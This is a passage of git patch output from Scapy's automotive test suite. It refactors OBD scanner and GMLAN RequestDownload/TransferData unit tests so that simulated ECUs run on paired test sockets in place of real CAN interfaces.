EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=6)/OBD_IID06(calibration_verification_numbers=[b'\xf9\x10\xb9\xfb', b'&6"e'], count=2)])), EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=8)/OBD_IID08(data=[9, 189, 8, 9, 0, 0, 8, 9, 0, 0, 22, 9, 0, 0, 0, 0, 8, 9, 0, 0], count=20)])), - EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=1, response_code=49)), - EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=10, response_code=49)), - EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=6, response_code=49)), - EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=8, response_code=17)), - EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=9, response_code=49))] + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=1, response_code=0x12)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=2, response_code=0x12)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=3, response_code=0x12)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=4, response_code=0x12)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=5, response_code=0x12)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=6, response_code=0x12)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=7, response_code=0x12)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=8, response_code=0x12)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=9, response_code=0x12)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=10, response_code=0x12))] + Simulate scanner = Run scanner with real world responses short scan -exit_if_no_isotp_module() +sniff(timeout=0.001, opened_socket=[ecu, tester]) -drain_bus(iface0) +answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) +sim = threading.Thread(target=answering_machine, kwargs={"timeout": 50, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) +sim.start() +try: + s = OBD_Scanner(tester, full_scan=False, timeout=1, retry_if_none_received=True, delay_state_change=0) + s.scan() + tester.send(b"\xff\xff\xff") +finally: + sim.join(timeout=10) -with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) - sim = threading.Thread(target=answering_machine, kwargs={"timeout": 60, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) - sim.start() - try: - with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e0, 0x7e8, basecls=OBD, padding=True) as socket: - s = OBD_Scanner(socket, full_scan=False) - s.scan() - socket.send(b"\xff\xff\xff") - socket.send(b"\xff\xff\xff") - finally: - sim.join(timeout=10) +s.show_testcases() assert len(s.enumerators) == 8 assert s.enumerators[0].__class__ == OBD_S01_Enumerator @@ -154,40 +132,38 @@ assert s.enumerators[5].__class__ == OBD_S03_Enumerator assert s.enumerators[6].__class__ == OBD_S07_Enumerator assert s.enumerators[7].__class__ == OBD_S0A_Enumerator -print(len(s.enumerators[0].results)) +print(len(s.enumerators[0].results_with_response)) -assert len(s.enumerators[0].results) == 33 # 32 pos resps + 1 NR -assert len([tup.resp for tup in s.enumerators[0].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 -assert len(s.enumerators[1].results) == 1 # 1 NR -assert len([tup.resp for tup in s.enumerators[1].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 -assert len(s.enumerators[2].results) == 18 # 17 pos resps + 1 NR -assert len([tup.resp for tup in s.enumerators[2].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 -assert len(s.enumerators[3].results) == 1 # 1 NR -assert len([tup.resp for tup in s.enumerators[3].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 -assert len(s.enumerators[4].results) == 9 # 8 pos resps + 1 NR -assert len([tup.resp for tup in s.enumerators[4].results if tup.resp is not None and tup.resp.service == 0x7f]) == 1 -assert len(s.enumerators[5].results) == 1 # 1 PR -assert len(s.enumerators[6].results) == 1 # 1 PR -assert len(s.enumerators[7].results) == 1 # 1 PR +assert len(s.enumerators[0].results_with_response) == 33 # 32 pos resps + 1 NR +assert len(s.enumerators[0].results_with_negative_response) == 1 +assert len(s.enumerators[1].results_with_response) == 1 # 1 NR +assert len(s.enumerators[1].results_with_negative_response) == 1 +assert len(s.enumerators[2].results_with_response) == 18 # 17 pos resps + 1 NR +assert len(s.enumerators[2].results_with_negative_response) == 1 +assert len(s.enumerators[3].results_with_response) == 1 # 1 NR +assert len(s.enumerators[3].results_with_negative_response) == 1 +assert len(s.enumerators[4].results_with_response) == 9 # 8 pos resps + 1 NR +assert len(s.enumerators[4].results_with_negative_response) == 1 +assert len(s.enumerators[5].results_with_response) == 1 # 1 PR +assert len(s.enumerators[6].results_with_response) == 1 # 1 PR +assert len(s.enumerators[7].results_with_response) == 1 # 1 PR = Run scanner with real world responses full scan -exit_if_no_isotp_module() +sniff(timeout=0.001, opened_socket=[ecu, tester]) -drain_bus(iface0) +answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) +sim = threading.Thread(target=answering_machine, kwargs={"timeout": 50, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) +sim.start() +try: + s = OBD_Scanner(tester, full_scan=True, timeout=1, delay_state_change=0, retry_if_none_received=True) + s.scan() + tester.send(b"\xff\xff\xff") +finally: + sim.join(timeout=10) -with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) - sim = threading.Thread(target=answering_machine, kwargs={"timeout": 60, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) - sim.start() - try: - with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e0, 0x7e8, basecls=OBD, padding=True) as socket: - s = OBD_Scanner(socket, full_scan=True) - s.scan() - socket.send(b"\xff\xff\xff") - finally: - sim.join(timeout=10) +s.show_testcases() assert len(s.enumerators) == 8 assert s.enumerators[0].__class__ == OBD_S01_Enumerator @@ -199,46 +175,44 @@ assert s.enumerators[5].__class__ == OBD_S03_Enumerator assert s.enumerators[6].__class__ == OBD_S07_Enumerator assert s.enumerators[7].__class__ == OBD_S0A_Enumerator -assert len(s.enumerators[0].results) == 0x100 # 32 pos resps + 1 NR +assert len(s.enumerators[0].results_with_response) == 0x100 # 32 pos resps + 1 NR print( len(s.enumerators[0].results_with_negative_response)) assert len(s.enumerators[0].results_with_negative_response) == 0x100 - 32 -print( len(s.enumerators[1].results)) -assert len(s.enumerators[1].results) == 0x100 +print( len(s.enumerators[1].results_with_response)) +assert len(s.enumerators[1].results_with_response) == 0x100 print( len(s.enumerators[1].results_with_negative_response)) assert len(s.enumerators[1].results_with_negative_response) == 0x100 -assert len(s.enumerators[2].results) == 0x100 # 17 pos resps +assert len(s.enumerators[2].results_with_response) == 0x100 # 17 pos resps assert len(s.enumerators[2].results_with_negative_response) == 0x100 - 17 -assert len(s.enumerators[3].results) == 0x100 +assert len(s.enumerators[3].results_with_response) == 0x100 assert len(s.enumerators[3].results_with_negative_response) == 0x100 -assert len(s.enumerators[4].results) == 0x100 # 8 pos resps +assert len(s.enumerators[4].results_with_response) == 0x100 # 8 pos resps assert len(s.enumerators[4].results_with_negative_response) == 0x100 - 8 -assert len(s.enumerators[5].results) == 1 # 1 PR -assert len(s.enumerators[6].results) == 1 # 1 PR -assert len(s.enumerators[7].results) == 1 # 1 PR +assert len(s.enumerators[5].results_with_response) == 1 # 1 PR +assert len(s.enumerators[6].results_with_response) == 1 # 1 PR +assert len(s.enumerators[7].results_with_response) == 1 # 1 PR = Run scanner only for Service 01 real world responses -exit_if_no_isotp_module() +sniff(timeout=0.001, opened_socket=[ecu, tester]) -drain_bus(iface0) +answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) +sim = threading.Thread(target=answering_machine, kwargs={"timeout": 50, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) +sim.start() +try: + s = OBD_Scanner(tester, test_cases=[OBD_S01_Enumerator], full_scan=False, retry_if_none_received=True, timeout=1, delay_state_change=0) + s.scan() + tester.send(b"\xff\xff\xff") +finally: + sim.join(timeout=10) -with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = EcuAnsweringMachine(supported_responses=responses, main_socket=ecu, basecls=OBD) - sim = threading.Thread(target=answering_machine, kwargs={"timeout": 60, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) - sim.start() - try: - with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e0, 0x7e8, basecls=OBD, padding=True) as socket: - s = OBD_Scanner(socket, test_cases=[OBD_S01_Enumerator], full_scan=False) - s.scan() - socket.send(b"\xff\xff\xff") - finally: - sim.join(timeout=10) +s.show_testcases() assert len(s.enumerators) == 1 assert s.enumerators[0].__class__ == OBD_S01_Enumerator -assert len(s.enumerators[0].results) == 33 # 32 pos resps + 1 NR +assert len(s.enumerators[0].results_with_response) == 33 # 32 pos resps + 1 NR assert len(s.enumerators[0].results_with_negative_response) == 1 From 40f5bb8c5a40f0fe86ed96e9156475e50a47f123 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 30 Aug 2021 11:41:56 +0200 Subject: [PATCH 0658/1632] Cleanup unit test for gmlanutils.py --- test/contrib/automotive/gm/gmlanutils.uts | 1611 ++++++++++----------- test/contrib/isotp_soft_socket.uts | 2 +- 2 files changed, 738 insertions(+), 875 deletions(-) diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 8c8405e9ea8..f334daf08eb 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -1,5 +1,4 @@ % Regression tests for gmlanutil -~ not_pypy needs_root automotive_comm + Configuration ~ conf @@ -19,231 +18,217 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: load_contrib("automotive.gm.gmlan", globals_dict=globals()) load_contrib("automotive.gm.gmlanutils", globals_dict=globals()) += Define test sockets + +isotpsock2 = TestSocket(GMLAN) +isotpsock = TestSocket(GMLAN) +isotpsock2.pair(isotpsock) + ############################################################################## + GMLAN_RequestDownload Tests ############################################################################## = Positive, immediate positive response -drain_bus(iface0) + ecusimSuccessfullyExecuted = False started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN()/GMLAN_RD(memorySize=4) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - else: - ecusimSuccessfullyExecuted = True - ack = b"\x74" - isotpsock2.send(ack) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN()/GMLAN_RD(memorySize=4) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + else: + ecusimSuccessfullyExecuted = True + ack = b"\x74" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True - thread.join(timeout=5) +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True +thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True = Negative, immediate negative response -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - nr = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x22) - isotpsock2.send(nr) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + nr = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x22) + isotpsock2.send(nr) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False +thread.join(timeout=5) +assert res = Negative, timeout - -drain_bus(iface0) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False +assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False ############################ Response pending = Positive, after response pending -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=2, started_callback=started.set) - pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) - isotpsock2.send(pending) - ack = b"\x74" - isotpsock2.send(ack) + isotpsock2.sniff(count=1, timeout=2, started_callback=started.set) + pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) + isotpsock2.send(pending) + ack = b"\x74" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_RequestDownload(isotpsock, 4, timeout=2) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_RequestDownload(isotpsock, 4, timeout=2) == True +thread.join(timeout=5) +assert res = Positive, hold response pending for several messages -drain_bus(iface0) -tout = 1 +tout = 0.1 repeats = 4 started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) - for i in range(repeats): - isotpsock2.send(ack) - time.sleep(tout) - ack = b"\x74" + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) + for i in range(repeats): isotpsock2.send(ack) + time.sleep(tout) + ack = b"\x74" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - starttime = time.time() # may be inaccurate -> on some systems only seconds precision - result = GMLAN_RequestDownload(isotpsock, 4, timeout=repeats*tout+0.5) - endtime = time.time() + 1 - thread.join(timeout=5) - assert result - print(endtime - starttime) - print(tout * (repeats - 1)) - assert (endtime - starttime) >= tout * (repeats - 1) +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +starttime = time.time() # may be inaccurate -> on some systems only seconds precision +result = GMLAN_RequestDownload(isotpsock, 4, timeout=repeats*tout+0.5) +endtime = time.time() + 1 +thread.join(timeout=5) +assert result +print(endtime - starttime) +print(tout * (repeats - 1)) +assert (endtime - starttime) >= tout * (repeats - 1) = Negative, negative response after response pending -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) - isotpsock2.send(pending) - nr = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x22) - isotpsock2.send(nr) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) + isotpsock2.send(pending) + nr = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x22) + isotpsock2.send(nr) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False +thread.join(timeout=5) +assert res = Negative, timeout after response pending -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) - isotpsock2.send(pending) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) + isotpsock2.send(pending) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_RequestDownload(isotpsock, 4, timeout=0.3) == False - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_RequestDownload(isotpsock, 4, timeout=0.3) == False +thread.join(timeout=5) +assert res = Positive, pending message from different service interferes while pending -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) - isotpsock2.send(pending) - wrongservice = GMLAN()/GMLAN_NR(requestServiceId=0x36, returnCode=0x78) - time.sleep(0.1) - isotpsock2.send(wrongservice) - time.sleep(0.1) - isotpsock2.send(pending) - time.sleep(0.1) - ack = b"\x74" - isotpsock2.send(ack) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) + isotpsock2.send(pending) + wrongservice = GMLAN()/GMLAN_NR(requestServiceId=0x36, returnCode=0x78) + time.sleep(0.1) + isotpsock2.send(wrongservice) + time.sleep(0.1) + isotpsock2.send(pending) + time.sleep(0.1) + ack = b"\x74" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True +thread.join(timeout=5) +assert res = Positive, negative response from different service interferes while pending -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) - isotpsock2.send(pending) - time.sleep(0.1) - wrongservice = GMLAN()/GMLAN_NR(requestServiceId=0x36, returnCode=0x22) - isotpsock2.send(wrongservice) - time.sleep(0.1) - isotpsock2.send(pending) - time.sleep(0.1) - ack = b"\x74" - isotpsock2.send(ack) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) + isotpsock2.send(pending) + time.sleep(0.1) + wrongservice = GMLAN()/GMLAN_NR(requestServiceId=0x36, returnCode=0x22) + isotpsock2.send(wrongservice) + time.sleep(0.1) + isotpsock2.send(pending) + time.sleep(0.1) + ack = b"\x74" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True +thread.join(timeout=5) +assert res ################### RETRY = Positive, first: immediate negative response, retry: Positive -drain_bus(iface0) started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # negative - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN()/GMLAN_RD(memorySize=4) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - nr = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x22) - # positive retry - print("retry") - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) - pkt = GMLAN()/GMLAN_RD(memorySize=4) - print(requ) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x74" - isotpsock2.send(ack) + # negative + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN()/GMLAN_RD(memorySize=4) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + nr = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x22) + # positive retry + print("retry") + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) + pkt = GMLAN()/GMLAN_RD(memorySize=4) + print(requ) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x74" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_RequestDownload(isotpsock, 4, timeout=1, retry=1) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_RequestDownload(isotpsock, 4, timeout=1, retry=1) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True @@ -251,7 +236,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base + GMLAN_TransferData Tests ############################################################################## = Positive, short payload, scheme = 4 -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -259,26 +243,24 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, - dataRecord=payload) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x76" - isotpsock2.send(ack) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, + dataRecord=payload) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x76" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = Positive, short payload, scheme = 3 -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 3 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -286,26 +268,24 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN() / GMLAN_TD(startingAddress=0x400000, - dataRecord=payload) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x76" - isotpsock2.send(ack) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN() / GMLAN_TD(startingAddress=0x400000, + dataRecord=payload) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x76" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 0x400000, payload, timeout=1) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 0x400000, payload, timeout=1) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = Positive, short payload, scheme = 2 -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 2 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -313,26 +293,24 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted = True - with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - time.sleep(0) - requ = isotpsock2.sniff(count=1, timeout=2, started_callback=started.set) - pkt = GMLAN() / GMLAN_TD(startingAddress=0x4000, dataRecord=payload) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x76" - isotpsock2.send(ack) + time.sleep(0) + requ = isotpsock2.sniff(count=1, timeout=2, started_callback=started.set) + pkt = GMLAN() / GMLAN_TD(startingAddress=0x4000, dataRecord=payload) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x76" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=2) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=2) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = Negative, short payload -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -340,26 +318,22 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - nr = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x22) - isotpsock2.send(nr) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + nr = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x22) + isotpsock2.send(nr) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == False - thread.join(timeout=5) - assert res - -drain_bus(iface0) +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == False +thread.join(timeout=5) +assert res + = Negative, timeout -with new_can_socket0() as isocan, ISOTPSocket(isocan, 